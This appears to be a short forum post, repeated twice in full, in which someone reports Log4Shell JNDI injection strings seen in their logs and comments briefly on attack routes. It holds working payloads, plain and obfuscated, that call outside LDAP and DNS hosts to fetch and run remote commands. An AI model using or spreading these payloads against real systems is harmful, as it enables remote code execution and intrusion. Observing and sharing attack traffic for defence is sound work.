jndi:dns://ip.address.scanworld.net/ref
jndi:ldap://162.55.90.26/222xxxx905/C
jndi:ldap://195.54.160.149:12344/Basic/Command/Base64...
jndi:ldap://45.130.229.168:1389/Exploit
{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....
Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.
I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.
jndi:dns://ip.address.scanworld.net/ref
jndi:ldap://162.55.90.26/222xxxx905/C
jndi:ldap://195.54.160.149:12344/Basic/Command/Base64...
jndi:ldap://45.130.229.168:1389/Exploit
{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....
Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.
I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.